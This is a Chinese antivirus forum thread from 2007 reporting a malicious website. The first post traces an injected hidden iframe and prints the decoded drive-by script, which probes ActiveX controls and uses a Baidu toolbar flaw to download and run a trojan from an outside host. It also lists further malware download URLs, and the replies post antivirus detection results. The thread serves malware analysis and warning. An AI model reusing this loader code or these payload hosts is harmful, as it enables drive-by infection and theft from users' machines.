查看: 9001|回复: 19
收起左侧

[已鉴定] [恶意网站播报]htp://www.xinlo.com

 关闭 [复制链接]
lovewei
发表于 2007-12-24 22:25:48 | 显示全部楼层 |阅读模式
卡饭网友举报一毒网http://www.xinlo.comhttp://bbs.kafan.cn/viewthread.php?tid=175899&;extra=page%3D1&page=1),经测试,果然挂毒在页面顶部
<iframe src='http://free.u-uuu.cn/error.htm' width=1 height=1></iframe>
追下去
—>http://www.news991.com/photo/gift.htm —>http://www.news991.com/um/mm.html
得到的网马代码解密出来:
if(document.cookie.indexOf('OK')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("\x63\x6c\x61\x73\x73\x69\x64","\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36");var as=ado.createobject("\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='OK=Yes;path=/;expires='+expires.toGMTString();if(e!="[object Error]"){document.write('')}else{try{var f;var storm=new ActiveXObject("IERPCtl.IERPCtl.1")}catch(f){};finally{if(f!="[object Error]"){document.write('')}}try{var g;var pps=new ActiveXObject("MPS.StormPlayer")}catch(g){};finally{if(g!="[object Error]"){document.write('')}}try{var h;var yahoo=new ActiveXObject("GLCHAT.GLChatCtrl.1")}catch(h){};finally{if(h!="[object Error]"){document.write('')}}try{var i;var ourgame=new ActiveXObject("Pdg2")}catch(i){};finally{if(i!="[object Error]"){document.write('')}}try{var j;var storm=new ActiveXObject("PPlayer.XPPlayer.1")}catch(j){};finally{if(j!="[object Error]"){document.write('')}}try{var k;var Fuck=new ActiveXObject("BaiduBar.Tool")}catch(k){};finally{if(k!="[object Error]"){Fuck["\x44\x6c\x6f\x61\x64\x44\x53"]("http://www.uhbaidu.com/um/Baidu.cab","\x42\x61\x69\x64\x75\x2e\x65\x78\x65",0)}}if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"&&k=="[object Error]"){location.replace("about:blank")}}}}

主要是利用MS06014挂的百度搜霸漏洞,病毒地址:http://www.uhbaidu.com/um/Baidu.cab

初步分析:加壳类型UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
可能会感染硬盘上所有网页文件,删除GHO备份文件,关闭瑞星杀毒、卡巴斯基、macafee、nod32、VirusScan Enterprise、mcshield.exe、rav9.com、testks.com、金山毒霸、360、360safe
下载病毒文件http://www.new991.com/mmn/1.exe~13.exe
http://www.new991.com/13.exe  ,  http://www.yiwumi.cn/aa.exe

[ 本帖最后由 lovewei 于 2007-12-24 22:41 编辑 ]

Baidu.rar

25.1 KB, 下载次数: 501

评分

参与人数 1经验 +2 收起 理由
jimmyleo + 2 打响第一炮

查看全部评分

tracydk
发表于 2007-12-24 22:27:14 | 显示全部楼层
1.jpg
zhr5898
发表于 2007-12-24 22:37:02 | 显示全部楼层
微点已知···
木马名称:Trojan.Win32.Genetik.evo

程序:
D:\BAIDU\BAIDU\BAIDU.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?
nosferatu
头像被屏蔽
发表于 2007-12-24 22:49:50 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\Baidu.rar'
C:\Documents and Settings\Administrator\桌面\Baidu.rar
  [0] Archive type: RAR
  --> Baidu\BAIDU.exe
      [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
      [INFO]      The file was deleted!
ytmss15
发表于 2007-12-25 00:44:45 | 显示全部楼层
o(∩_∩)o...哈哈小A全报了
will
发表于 2007-12-25 00:56:13 | 显示全部楼层

avast!

Win32:Delf-FKN [Trj]
yclidong
发表于 2007-12-25 08:00:58 | 显示全部楼层
C:\Documents and Settings\Administrator\桌面\Baidu.rar &raquo; RAR &raquo; Baidu\BAIDU.exe - probably a variant of Win32/Genetik trojan
qpsr2007
发表于 2007-12-25 11:18:32 | 显示全部楼层
小伞看来还是值得信赖的!!!
caocao
发表于 2007-12-25 11:39:05 | 显示全部楼层
KIS
已删除:木马程序 Trojan-Downloader.Win32.Agent.gjt        文件: D:\Downloads\Baidu.rar/Baidu\BAIDU.exe//PE_Patch.UPX//UPX
lllhg1234
发表于 2007-12-25 13:47:44 | 显示全部楼层
nis2008
扫描统计:
扫描时间: 1秒
扫描选项:
扫描目标: E:\Baidu.rar
  计数:
扫描的项目总数: 3
- 文件和目录: 3
- 注册表项: 0
- 进程和启动项: 0
- 网络和浏览器项目: 0
- 其他: 0

检测到的安全风险总数: 1
已解决的项目总数: 0
需要注意的项目总数: 1

已解决的风险:


未解决的风险:
W32.SillyDC
病毒 ID: 11498
类型: 已压缩
风险: 高 (高 隐蔽性,高 清除可能,高 性能,高 隐私)  
类别: 病毒
状态: 删除失败
-----------
1 文件
[baidu.exe] 位于[e:\baidu.rar] - 已感染
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-14 15:14 , Processed in 0.133161 second(s), 21 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表